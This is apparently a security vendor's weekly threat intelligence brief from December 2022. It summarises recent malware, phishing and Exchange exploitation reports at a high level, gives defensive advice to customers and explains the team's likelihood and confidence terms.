Cyber Intel Brief: Dec 15 – 21, 2022

New Techniques

DarkTorilla Malware Delivered via New Methods

Impacted Industries: All

What You Need To Know:

Cybercriminals are likely using typosquatting or search engine results to distribute DarkTortilla malware through websites impersonating Grammarly (active) and Cisco (non-operational, expecting to rehost or use a different URL) discovered by Cyble. However, threat actors could send links to the websites through phishing emails to targets. DarkTortilla is known to drop multiple stealers, Remote Access Trojans, and Cobalt Strike. According to open-source reporting, an average of 93 unique samples were uploaded weekly to VirusTotal from January 2021 through May 2022. The primary motive for these attacks is likely financial gain, though some threat actors may have nation-state interests. Customers should share images of the impersonated sites with end-users and include the Drive by Compromise technique [T1189] in your cybersecurity awareness program.


New Techniques

New Exploit Method Discovered for Microsoft Exchange

Impacted Industries: All

What You Need To Know:

Cybercriminals are highly likely to download publicly available scripts and tools and scan for vulnerable systems to exploit a vulnerability in Microsoft Exchange servers discovered by Crowdstrike. In their report, Crowdstrike provided the location to download the exploit code and other tools. Using the exploit code, we expect exploitation attempts to increase in the coming months. Crowdstrike discovered that cybercriminals are using the Outlook Web Application (OWA) endpoint to access the Remote PowerShell service and drop tooling for persistent access to vulnerable Microsoft Exchange servers, bypassing known vulnerabilities in the Autodiscover endpoint. If successful, this technique could allow cybercriminals to access email and calendar information, potentially exposing sensitive or confidential data and potentially causing further damage by using the Exchange server as a launching point for network attacks. Due to the attack, customers may also face significant downtime, disruption, and financial losses, including ransom demands.


Malware

Glupteba Botnet Reemerges After Google Disruption In Late 2021

Impacted Industries: All

What You Need To Know:

Cybercriminals will likely leverage Bitcoin blockchain technology, a technique employed by the Glupteba botnet, to distribute C2 domains in their campaigns or to carry out other tasks due to the discovery by Nozomi Networks that the botnet has reemerged, taking only six months to build a new campaign from scratch and distribute it on a larger scale after Google disrupted its operation in December 2021. The botnet has infected devices worldwide through online ad campaigns and infected installers or software cracks. They are known for stealing user credentials and cookies, mining cryptocurrencies on infected hosts, deploying and operating proxy components, and offering services such as selling access to virtual machines loaded with stolen credentials and proxy access.


Malware

New Stealer Malware Discovered

Impacted Industries: All

What You Need To Know:

Cybercriminals are highly likely using additional methods to distribute a new stealer dubbed RisePro discovered by Flashpoint when their analysis identified that the PrivateLoader network of websites claiming to provide “cracked” software delivered some samples of the malware. Flashpoint identified over 2,000 individual logs (we assume 2,000 computers were infected) for sale on the cybercriminal marketplace Russian Market. However, other marketplaces may be selling data stolen by RisePro, increasing the number of infected devices. Customers should train users on the dangers of downloading unsafe software and logging in to corporate accounts on personal devices.


Malware

Cybercriminals Inject Malicious Code on 160 Websites, Redirecting Visitors to Phishing Pages

Impacted Industries: All

What You Need To Know:

Cybercriminals have or will likely register other domains after Sucuri identified 160 websites–likely more exists–that cybercriminals injected with a malicious script. When a user visits the compromised site, it executes a script hosted on jquery0[.]com that redirects visitors to phishing pages. This technique is one possible variation. For example, Malwarebytes linked the domain to FakeUpdates and SocGholish malware campaigns. Any cybercriminal can target specific organizations or industries through open-source research on employees’ social media sharing habits, attempting to inject malicious code into the most frequently shared and discussed websites.


Threat Landscape

The Rising Trend of IPFS Based Phishing

Impacted Industries: All

What You Need To Know:

Cybercriminals will likely continue hosting malicious content and using InterPlanetary File System (IPFS) gateways to conduct phishing campaigns, posing an emerging threat to customers. Recently, Trend Micro observed a steady increase in the use of IPFS gateways for phishing attacks, with 3,966 unique content identifiers used for phishing. IPFS is a decentralized, peer-to-peer protocol for sharing and storing files, which cybercriminals exploit for phishing and distributing malware. The decentralized nature of IPFS makes it challenging to delete malicious content hosted on it, making it easier for cybercriminals to launch phishing campaigns and harder for victims to identify and protect themselves. Falling victim to a phishing attack can result in the loss of sensitive data, financial losses, reputational damage, legal consequences, and disruption of business operations. Customers should be vigilant and use tools and practices to detect and prevent IPFS-related phishing attacks.


Threat Landscape

The Rising Trend of Excel XLL Add-ins

Impacted Industries: All

What You Need To Know:

Cybercriminals are expected to discontinue using VBA-based malicious documents, instead relying on formats such as XLLs or exploiting newly discovered vulnerabilities. This assessment is due to Cisco Talos’s estimation that an increasing number of cybercriminals and commodity malware families are using malicious add-ins, specifically XLL files, as a vector for introducing malicious code to Microsoft Excel. These add-ins, which are executable code that can be added to Office applications to enhance their appearance or functionality, can be dropped in specific locations and loaded into the application’s process space if an attacker can place them in a trusted location. Several notable cybercriminal groups, including TA410, FIN7, Dridex, and Formbook, are known to use XLL add-ins. The potential impacts of an attack using this method include stealing sensitive information, disrupting operations, launching ransomware attacks, installing spyware, and turning the victim’s device into a part of a botnet, which could result in financial loss, reputational damage, and loss of productivity for the victim.


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.

Share

LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog